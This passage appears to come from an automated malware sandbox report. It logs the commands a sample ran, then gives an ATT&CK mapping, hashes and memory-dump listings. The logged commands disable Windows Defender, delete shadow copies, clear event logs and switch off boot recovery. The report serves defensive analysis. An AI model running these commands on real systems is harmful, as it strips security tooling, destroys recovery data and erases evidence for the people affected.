  2⤵
  PID:624
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1152
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:764
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1808
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1724
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1696
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  2⤵
  PID:588
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  2⤵
  PID:1704
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  2⤵
  PID:1184
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  2⤵
  PID:1208
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:1800
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:900
- C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  2⤵
  PID:740
- C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  2⤵
  PID:1976
- C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  2⤵
  PID:1484
- C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  2⤵
  PID:1648
- C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  2⤵
  PID:864
- C:\Windows\system32\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  2⤵
  PID:1100
- C:\Windows\system32\reg.exe
  reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  2⤵
  PID:2012
- C:\Windows\system32\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  2⤵
  PID:1588
- C:\Windows\system32\reg.exe
  reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:1144
- C:\Windows\system32\reg.exe
  reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:1764
- C:\Windows\system32\reg.exe
  reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:1188
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:1772
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:1916
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:1540
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:1972
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies security service
  PID:1728
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:856
- C:\Windows\system32\vssadmin.exe
  vssadmin.exe delete shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:1216
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl system
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:1860
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl security
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:1112
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl application
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:1612
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe SHADOWCOPY /nointeractive
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1172
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe shadowcopy delete
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:632
- C:\Windows\system32\bcdedit.exe
  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1712
- C:\Windows\system32\bcdedit.exe
  bcdedit.exe /set {default} recoveryenabled no
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1804
- C:\Windows\system32\cmd.exe
  cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
  2⤵
  PID:520
- - C:\Program Files\Windows Defender\MpCmdRun.exe
    "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    3⤵
    - Deletes Windows Defender Definitions
    PID:1708
- C:\Windows\system32\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
  2⤵
  PID:1552
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableIOAVProtection $true
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1924
- C:\Windows\system32\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  2⤵
  PID:2036
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableRealtimeMonitoring $true
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:976

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File Deletion

T1107

Impair Defenses

T1562

Indicator Removal on Host

T1070

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f6d74e5ebb94846cd230e9d64c5b1acf

SHA1
4f246361d8e1155b67299e5e25c22f66fcbf3da1

SHA256
a606df8de2a0ddd19843b1076da000445ce1e397e2c14b72d2003432d0cac5f1

SHA512
8f9ea2b55b24c6a4edc0953ea74e8bbddbca8f88c79731c24527b6614b82bb5a727186b21dcf526e9e7f693ec31c1272f6da34272ffbc099273cbb2f41451712

Download Submit
memory/240-80-0x0000000000000000-mapping.dmp

Download
memory/272-68-0x0000000000000000-mapping.dmp

Download
memory/364-75-0x0000000000000000-mapping.dmp

Download
memory/588-88-0x0000000000000000-mapping.dmp

Download
memory/624-82-0x0000000000000000-mapping.dmp

Download
memory/632-119-0x0000000000000000-mapping.dmp

Download
memory/652-63-0x0000000000000000-mapping.dmp

Download
memory/672-64-0x0000000000000000-mapping.dmp

Download
memory/740-94-0x0000000000000000-mapping.dmp

Download
memory/764-84-0x0000000000000000-mapping.dmp

Download
memory/856-110-0x0000000000000000-mapping.dmp

Download
memory/864-98-0x0000000000000000-mapping.dmp

Download
memory/900-93-0x0000000000000000-mapping.dmp

Download
memory/924-72-0x0000000000000000-mapping.dmp

Download
memory/964-58-0x0000000000000000-mapping.dmp

Download
memory/976-131-0x0000000002584000-0x0000000002587000-memory.dmp

Filesize
12KB

Download
memory/976-128-0x000007FEF3DC0000-0x000007FEF47E3000-memory.dmp

Filesize
10.1MB

Download
memory/976-132-0x000000000258B000-0x00000000025AA000-memory.dmp

Filesize
124KB

Download
memory/976-130-0x0000000002584000-0x0000000002587000-memory.dmp

Filesize
12KB

Download
memory/976-129-0x000007FEF3260000-0x000007FEF3DBD000-memory.dmp

Filesize
11.4MB

Download
memory/1000-77-0x0000000000000000-mapping.dmp

Download
memory/1088-81-0x0000000000000000-mapping.dmp

Download
memory/1092-70-0x0000000000000000-mapping.dmp

Download
memory/1100-99-0x0000000000000000-mapping.dmp

Download
memory/1108-55-0x0000000000000000-mapping.dmp

Download
memory/1112-114-0x0000000000000000-mapping.dmp

Download
memory/1144-102-0x0000000000000000-mapping.dmp

Download
memory/1152-83-0x0000000000000000-mapping.dmp

Download
memory/1164-71-0x0000000000000000-mapping.dmp

Download
memory/1172-118-0x0000000000000000-mapping.dmp

Download
memory/1184-90-0x0000000000000000-mapping.dmp

Download
memory/1188-104-0x0000000000000000-mapping.dmp

Download
memory/1208-91-0x0000000000000000-mapping.dmp

Download
memory/1212-79-0x0000000000000000-mapping.dmp

Download
memory/1216-111-0x0000000000000000-mapping.dmp

Download
memory/1284-74-0x0000000000000000-mapping.dmp

Download
memory/1324-54-0x0000000000000000-mapping.dmp

Download
memory/1484-96-0x0000000000000000-mapping.dmp

Download
memory/1512-73-0x0000000000000000-mapping.dmp

Download
memory/1540-107-0x0000000000000000-mapping.dmp

Download
memory/1588-101-0x0000000000000000-mapping.dmp

Download
memory/1612-116-0x0000000000000000-mapping.dmp

Download
memory/1628-78-0x0000000000000000-mapping.dmp

Download
memory/1648-97-0x0000000000000000-mapping.dmp

Download
memory/1668-66-0x0000000000000000-mapping.dmp

Download
memory/1676-76-0x0000000000000000-mapping.dmp

Download
memory/1696-87-0x0000000000000000-mapping.dmp

Download
memory/1700-60-0x0000000000000000-mapping.dmp

Download
memory/1704-89-0x0000000000000000-mapping.dmp

Download
memory/1712-120-0x0000000000000000-mapping.dmp

Download
memory/1720-65-0x0000000000000000-mapping.dmp

Download
memory/1724-59-0x0000000000000000-mapping.dmp

Download
memory/1724-86-0x0000000000000000-mapping.dmp

Download
memory/1728-109-0x0000000000000000-mapping.dmp

Download
memory/1732-61-0x0000000000000000-mapping.dmp

Download
memory/1744-56-0x0000000000000000-mapping.dmp

Download
memory/1764-103-0x0000000000000000-mapping.dmp

Download
memory/1772-105-0x0000000000000000-mapping.dmp

Download
memory/1800-92-0x0000000000000000-mapping.dmp

Download
memory/1800-69-0x0000000000000000-mapping.dmp

Download
memory/1804-57-0x0000000000000000-mapping.dmp

Download
memory/1808-85-0x0000000000000000-mapping.dmp

Download
memory/1860-113-0x000007FEFC141000-0x000007FEFC143000-memory.dmp

Filesize
8KB

Download
memory/1860-112-0x0000000000000000-mapping.dmp

Download
memory/1916-106-0x0000000000000000-mapping.dmp

Download
memory/1924-122-0x000007FEF4760000-0x000007FEF5183000-memory.dmp

Filesize
10.1MB

Download
memory/1924-123-0x000007FEF3C00000-0x000007FEF475D000-memory.dmp

Filesize
11.4MB

Download
memory/1924-125-0x000000000252B000-0x000000000254A000-memory.dmp

Filesize
124KB

Download
memory/1924-124-0x0000000002524000-0x0000000002527000-memory.dmp

Filesize
12KB

Download
memory/1956-62-0x0000000000000000-mapping.dmp

Download
memory/1972-108-0x0000000000000000-mapping.dmp

Download
memory/1976-95-0x0000000000000000-mapping.dmp

Download
memory/2012-100-0x0000000000000000-mapping.dmp

Download
memory/2028-67-0x0000000000000000-mapping.dmp

Download